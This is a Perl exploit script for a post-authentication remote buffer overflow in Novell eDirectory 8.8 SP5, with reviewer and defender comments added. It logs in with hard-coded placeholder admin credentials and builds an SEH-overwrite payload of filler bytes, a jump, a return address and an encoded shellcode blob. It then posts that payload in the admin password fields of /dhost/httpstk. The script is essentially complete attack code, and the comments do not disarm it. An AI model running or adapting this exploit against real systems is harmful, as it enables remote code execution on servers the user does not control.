Novell_eDirectory_8.8_SP5_0day.pl
# Exploit Title: Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF Exploit (0day)
# Date: 06/01/2010
# Author: His0k4 & Simo36
# Version: 8.8 SP5
# Tested on: Windows xp sp3
# Code :
#!usr\bin\perl
use WWW::Mechanize;
use HTTP::Cookies;
use HTTP::Headers;
# Argument handling. The target base URL is taken verbatim from the first
# command-line argument; nothing validates or normalises it before it is
# interpolated into the request URLs further down.
# NOTE(review): no `use strict` / `use warnings` appears in the visible lines,
# so $target and the other undeclared variables are package globals.
$target=$ARGV[0];
# No argument given: print the banner and usage text, then exit before any
# network activity takes place.
if(!$ARGV[0]){
print "[+] Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF (0day)\n";
print "[+] Exploit : His0k4 & Simo36\n";
print "Usage:perl $0 [target]\n";
# NOTE(review): "exploit.pl<http://exploit.pl>" looks like an auto-linking
# artifact from wherever this listing was copied; presumably the example was
# just the script name followed by the target URL. The example URL shows the
# management interface being reached over HTTPS on port 8030.
print "Example : exploit.pl<http://exploit.pl> https://192.168.1.2:8030\n";
exit();
}
# Two paths on the target are used: the login page and the /dhost/httpstk page.
# Defender note: these are the request paths to look for in web, proxy or
# application logs when checking whether this script was run against a host.
$login_url = "$target/_LOGIN_SERVER_";
$url = "$target/dhost/httpstk";
# calc shellcode
# (The label above is the author's. The string is an opaque encoded blob made
# up only of printable ASCII letters and digits; what it does cannot be
# confirmed from this listing alone.)
my $shellcode =
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJItiO9mSHi".
"YNjyzNYIRTetxtQKOqpsgcHUKIin24OsjKkL9r8tWYVqNZWdXUL9T5PQhid2".
"NbvqlmKH21MOLZyqT5PKXujXVuQM1NhMpuTUukYXunNmpy3MUnSPjrP8FTWi".
"n4wKTUKPjNnMxZb0MpGl2U2kxqzXFu2RSn8uLuMONjHekOYoSnxeCEvuWNpp".
"LbDpXQwJJoJtNQ1bONWT2pfYK64XCnLykBMOY5m5scooOMxq4UwmqNBY0Nb4".
"yEIirUQlkYMvhOXbLuNOrWJLpVVYou3toMlGwVhvnFnqSVIzCoygMyJKdroj".
"mOBXx6Xyinr4eZA";
# The value later sent to the server is a fixed-layout concatenation of the
# pieces below. The fixed-size parts alone total 1,527 bytes
# (468 + 4 + 4 + 3 + 2 + 146 + 900), plus the blob above -- far longer than any
# legitimate password value.
# NOTE(review): the variable names ($jmp, $seh) together with "BOF" in the
# header suggest an overflow that reaches an exception-handler record; the
# sizes are presumably specific to the build named in the header (8.8 SP5 on
# Windows XP SP3) -- not verifiable from this listing.
# Defender note: in this unmodified script the filler is long runs of 0x41 ('A')
# and 0x43 ('C'), which makes a simple content signature for the two password
# fields it is placed in.
my $junk = "\x41" x 468;
my $jmp = "\x75\x06\x41\x42";
my $seh = "Du0d"; #Univ ret
my $align = "\x61" x 3;
my $eax = "\x50\xC3";
my $data1 = "\x43" x 146;
my $data2 = "\x43" x 900;
my $payload = $junk.$jmp.$seh.$align.$eax.$data1.$shellcode.$data2;
########Change Admin info########
# The issue is post-authentication (see the header): the script logs in first,
# using the administrator credentials hard-coded here as placeholders.
# Defender note: because a valid admin login is required, limiting who can
# reach and authenticate to this management interface reduces exposure, as does
# applying the vendor's fix for the affected version.
$username = "Admin.context";
$password = "passwd";
#########################################
# HTTP client with a cookie jar so the session obtained at login is reused for
# the later requests.
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
#Login
# Request sequence as it would appear in server logs, step 1 and 2:
# fetch the login page, then submit its form named "authenticator" with the
# usr / pwd fields via the 'Login' button.
print "[x] Sending User & pass...\n";
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
$mechanize->submit_form(
form_name => "authenticator",
fields => {
usr => $username,
pwd => $password},
button => 'Login');
#vuln occurring
# Step 3 and 4: fetch /dhost/httpstk, then submit the current form of that page
# with the same oversized value in both sadminpwd and verifypwd.
# Defender note: a length limit on these two fields (in the application or in a
# filtering proxy in front of it) and an alert on values of more than a few
# hundred bytes cover this request without depending on the filler bytes.
# $res is assigned but never inspected, so the status lines printed here say
# nothing about how the server responded.
print "[x] Sending Exploit...\n";
$res = $mechanize->get("$url");
print "[x] Exploit Sent!\n";
$mechanize->submit_form(
fields => {
sadminpwd => $payload,
verifypwd => $payload}
);